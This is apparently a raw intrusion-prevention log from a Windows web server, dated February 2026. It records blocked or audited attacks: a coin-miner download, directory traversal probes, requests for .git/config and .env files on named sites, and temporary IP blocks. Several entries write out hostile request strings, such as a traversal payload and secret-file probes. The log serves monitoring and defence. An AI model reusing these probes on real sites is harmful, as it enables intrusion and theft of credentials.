SIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo0MDYyNCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAyNzYyNjQxMCwidWlkIjoiN0UzNjI1MUEtMDAyMC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000ed1a	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770034354.4802510738372802734375			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000212	01dc943dc47ab26b	000000cf	00000007	164a8367	56fb76d8	00000001	00000000	00000001	01dc943dc2813e8a	01dc943f2821fa8a	00000001	00000000	The client will block traffic from IP address 216.118.251.86 for the next 600 seconds (from 2/2/2026 7:16:29 PM to 2/2/2026 7:26:29 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003c6	01dc943de5bc22d2	000000ce	0000000f	164a8367	56fb76d8	00000002	00000002	00000001	01dc943dc1df1dad	01dc943dc1df1dad	00000001	00000118	[SID: 34488] Audit: Generic Directory Traversal 10 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMxREJEMDI1LTk0M0QtMTFGMS04NEQxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQ0ODgsIm5hbWUiOiJBdWRpdDogR2VuZXJpYyBEaXJlY3RvcnkgVHJhdmVyc2FsIDEwIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000086b8	00010000	00000002	00000002	0000e41b	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Generic Directory Traversal 10	http://www.palm-landscape.com/index/ajax/lang?lang=..//..//application/database			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c6	01dc943de90f54ac	000000ce	00000003	164a8367	56fb76d8	00000002	00000001	00000001	01dc943dc2565dd0	01dc943dc2565dd0	00000001	00000114	[SID: 34373] Attack: Malicious Scan Request 30 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMxREJEMDI0LTk0M0QtMTFGMS04NEQxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQzNzMsIm5hbWUiOiJBdHRhY2s6IE1hbGljaW91cyBTY2FuIFJlcXVlc3QgMzAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00008645	00010000	00000002	00000002	0000e41b	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Attack: Malicious Scan Request 30	http://www.palm-landscape.com/index/ajax/lang?lang=..//..//application/database			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc943ec46c32a0	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc943e9e837ee5	01dc943e9e837ee5	00000001	00000000	Active Response that started at 2/2/2026 7:12:38 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000216	01dc943f4ca7bc9e	000000d3	0000000f	164a8367	56fb76d8	00000001	00000000	00000000	01dc943f28249fec	01dc943f28249fec	00000001	00000000	Active Response that started at 2/2/2026 7:16:29 PM is disengaged. The traffic from IP address 216.118.251.86 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000037c	01dc94419596e254	000000ce	0000000f	164a8367	5e171d14	00000002	00000002	00000001	01dc944171d305c1	01dc944171d305c1	00000001	00000110	[SID: 32329] Audit: Malicious Scan Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjcxRDA4MUU5LTk0NDEtMTFGMS1CMEJDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIzMjksIm5hbWUiOiJBdWRpdDogTWFsaWNpb3VzIFNjYW4gQXR0ZW1wdCAyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00007e49	00010000	00000002	00000002	0000e8e0	000001bb	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Malicious Scan Attempt 2	http://103.131.74.22:443/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039c	01dc944327cd4a2c	000000ce	0000000f	164a8367	6c6eb2c3	00000002	00000002	00000001	01dc9443026cf7f4	01dc9443026cf7f4	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjAyNjlFNDgxLTk0NDMtMTFGMS04OEMxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000b842	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://patahcmc.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b1	01dc94434c594c57	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc944325f5409f	01dc944325f5409f	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjI1RjFGODQzLTk0NDMtMTFGMS1COUE4LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000af9c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://cs.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b1	01dc9444a2bde587	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94447d649d87	01dc94447d649d87	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjdENjNDOTAxLTk0NDQtMTFGMS1BOUI1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c264	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://dd.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc94459f5ed19f	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc94459d86bfec	01dc944703277bec	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 8:12:43 PM to 2/2/2026 8:22:43 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc9445c3e81ec0	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94459d29c1eb	01dc94459d29c1eb	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM2NzMyLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDM2MjA0NDYyLCJ1aWQiOiIwNDY4MTk5Ri0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI5RDI2RkVCQS05NDQ1LTExRjEtQjA2Ni04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG03ZDZiZDg0NS03MjI3LTQwODMtOWNhNC05NzhiNWRhYjcxNDIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyMTI2OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAzNTMzOTQwNCwidWlkIjoiMDQ2ODE3NTctMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000f8db	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770037959.0912868976593017578125			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003b1	01dc94468b527338	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc944664ee98da	01dc944664ee98da	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY0RURFNzhGLTk0NDYtMTFGMS1BNDMxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c218	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://cp.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039e	01dc9446c07ffc39	000000ce	0000000f	164a8367	c76eb2c3	00000002	00000002	00000001	01dc94469a5f67fc	01dc94469a5f67fc	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlBNUU3QjJGLTk0NDYtMTFGMS04QTlCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000a9b2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://th-ecotech.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc94472acbd66b	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc944703c27ea9	01dc944703c27ea9	00000001	00000000	Active Response that started at 2/2/2026 8:12:43 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b2	01dc944870794008	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94484b5914f8	01dc94484b5914f8	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjRCNTY2NDU5LTk0NDgtMTFGMS05MDM0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000ab74	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://dev.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc944a0caaabfe	000000ce	0000000f	164a8367	7bc5f45b	00000002	00000002	00000001	01dc9449e5ae82de	01dc9449e5ae82de	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU1QUU1RTRCLTk0NDktMTFGMS1BQzRGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009c38	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.vinhhungoldtownhotel.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c7	01dc944a0caaabfe	000000ce	0000000f	164a8367	7bc5f45b	00000002	00000002	00000001	01dc9449e63405b4	01dc9449e63405b4	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU1RkVGMERELTk0NDktMTFGMS1BQzcxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009c3c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://webdisk.vinhhungoldtownhotel.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c4	01dc944a0caaabfe	000000ce	0000000f	164a8367	7bc5f45b	00000002	00000002	00000001	01dc9449e6be4e87	01dc9449e6be4e87	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU2QkQ2MUIyLTk0NDktMTFGMS1BQ0MxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00009c48	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://mail.vinhhungoldtownhotel.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c6	01dc944a10003ace	000000ce	0000000f	164a8367	7bc5f45b	00000002	00000002	00000001	01dc9449ea6c1430	01dc9449ea6c1430	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkVBNkI0RjlBLTk0NDktMTFGMS1BRTRDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b530	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://cpanel.vinhhungoldtownhotel.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039d	01dc944a31365c49	000000ce	0000000f	164a8367	f66eb2c3	00000002	00000002	00000001	01dc944a0aecd43c	01dc944a0aecd43c	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjBBRUNBRkExLTk0NEEtMTFGMS05REVFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00008e0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://103.131.74.22/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000037d	01dc944aaf73a6a3	000000ce	0000000f	164a8367	a2383a02	00000002	00000002	00000001	01dc944a8aad36b5	01dc944a8aad36b5	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhBQUFDMzQ2LTk0NEEtMTFGMS1BMzgyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000def5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://patahcmc.com/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a0	01dc944aaf73a6a3	000000ce	0000000f	164a8367	a2383a02	00000002	00000002	00000001	01dc944a8b2b93a3	01dc944a8b2b93a3	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhBQjEyNjlGLTk0NEEtMTFGMS1BMzg1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000d607	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://patahcmc.com/wp-content/themes/seotheme/db.php?u			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
